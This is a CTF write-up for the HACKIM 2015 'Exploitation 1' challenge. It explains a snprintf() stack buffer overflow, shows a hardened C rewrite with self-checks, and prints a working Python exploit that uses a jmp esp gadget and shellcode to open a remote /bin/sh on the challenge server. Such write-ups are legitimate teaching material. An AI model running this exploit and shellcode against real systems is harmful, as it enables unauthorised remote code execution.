Friday, January 16, 2015

HACKIM CTF 2015 - Exploitation 1

Exploitation 1 was a 32-bit ELF without NX protection. The vulnerability is a stack buffer overflow in the echo command, in the snprintf() call at 0x080489BF: snprintf() copies up to 8191 bytes of data supplied by read() into a 0x78-byte buffer, causing the overflow. Supplying 122 bytes along with echo: [6 bytes] will overwrite the saved EIP. There is also a nice jmp esp gadget to bypass ASLR. Below is the exploit:
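The bug class behind this challenge is a fixed-size stack buffer filled by snprintf() whose length argument describes the client's input rather than the destination. The following C is an added illustration written for this write-up, not the challenge binary's code: it places that mistake next to the hardened form and adds the input-length check a service author would want. The function names, the request format and the 8191/0x78 sizes used here are assumptions taken from the description above.

```c
#include <stdio.h>
#include <string.h>

#define REPLY_BUF   0x78   /* 120-byte stack buffer, the size named in the write-up */
#define BOGUS_LIMIT 8191   /* the length the write-up says reached snprintf() */

/* Bug pattern (assumed reconstruction, not the challenge's code): the size
 * argument is the read() limit, not the destination size, so the "n" in
 * snprintf() bounds nothing. The self-check below feeds it only a short line. */
int echo_reply_buggy(const char *line, char *out, size_t out_size)
{
    (void)out_size;                         /* real bound ignored: the defect */
    return snprintf(out, BOGUS_LIMIT, "%s\n", line);
}

/* Hardened form: bound by the destination and report truncation. snprintf()
 * returns the length it wanted to write, so >= out_size means "did not fit". */
int echo_reply(const char *line, char *out, size_t out_size)
{
    int needed = snprintf(out, out_size, "%s\n", line);
    if (needed < 0 || (size_t)needed >= out_size)
        return -1;
    return 0;
}

/* Handler shaped like the service: a fixed stack buffer behind an "echo "
 * command. Returns the reply length, -1 for an unknown command, -2 when the
 * argument would not fit (the case that overflowed in the challenge). */
int handle_echo(const char *request, char *reply, size_t reply_size)
{
    char buf[REPLY_BUF];
    if (strncmp(request, "echo ", 5) != 0)
        return -1;
    if (echo_reply(request + 5, buf, sizeof buf) != 0)
        return -2;
    int n = snprintf(reply, reply_size, "%s", buf);
    if (n < 0 || (size_t)n >= reply_size)
        return -2;
    return n;
}

/* Self-checks: 1 when behaviour matches the comments above, 0 otherwise. */
int check_short_line_ok(void)
{
    char out[REPLY_BUF];
    return handle_echo("echo hello", out, sizeof out) == 6
        && strcmp(out, "hello\n") == 0
        && echo_reply_buggy("hi", out, sizeof out) == 3;
}

int check_long_line_rejected(void)
{
    char request[5 + 200];                  /* constructed over-long request */
    char out[REPLY_BUF];
    memcpy(request, "echo ", 5);
    memset(request + 5, 'A', 199);          /* 199 bytes: well past 0x78 */
    request[5 + 199] = '\0';
    /* rejected by the handler, and the buffer itself stayed bounded */
    if (handle_echo(request, out, sizeof out) != -2)
        return 0;
    if (echo_reply(request + 5, out, sizeof out) != -1)
        return 0;
    return strlen(out) == REPLY_BUF - 1;    /* 119 chars + NUL, nothing beyond */
}

int main(void)
{
    printf("short line: %s\n", check_short_line_ok() ? "ok" : "FAIL");
    printf("long line:  %s\n", check_long_line_rejected() ? "rejected" : "FAIL");
    return 0;
}
```

The point of the hardened version is that the bound passed to snprintf() is derived from the destination with sizeof, and that truncation is treated as an error instead of being silently accepted; with NX disabled and a fixed buffer on the stack, either of those alone would have been enough to stop the overflow described above.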
```python
#!/usr/bin/env python
# Python 2 exploit as posted (str.decode('hex') and the print statement are Python 2 only).

import socket
import telnetlib
import struct

ip = "127.0.0.1"          # local test target, overridden by the line below
ip = "54.163.248.69"      # challenge server
port = 9000

# dup: redirect stdin/stdout/stderr onto the socket; execve: spawn /bin/sh
dup    = '31c031db31c9b103fec9b03fb304cd8075f6'.decode('hex')
execve = '31c9f7e151682f2f7368682f62696e89e3b00bcd80'.decode('hex')
shellcode = dup + execve

soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.connect((ip, port))
soc.recv(16)              # consume the banner
jmp_esp = 0x080488b0      # jmp esp gadget in the non-PIE binary

# "echo " + 118 bytes of padding reaches the saved EIP; the shellcode follows
# immediately, where esp points after the return.
payload  = "echo "
payload += "A" * 118
payload += struct.pack("<I", jmp_esp)
payload += shellcode
soc.send(payload + chr(0xa))

print "[*] Shell"
s = telnetlib.Telnet()
s.sock = soc
s.interact()
```
Flag for the challenge is aleph1-to-the-rescue++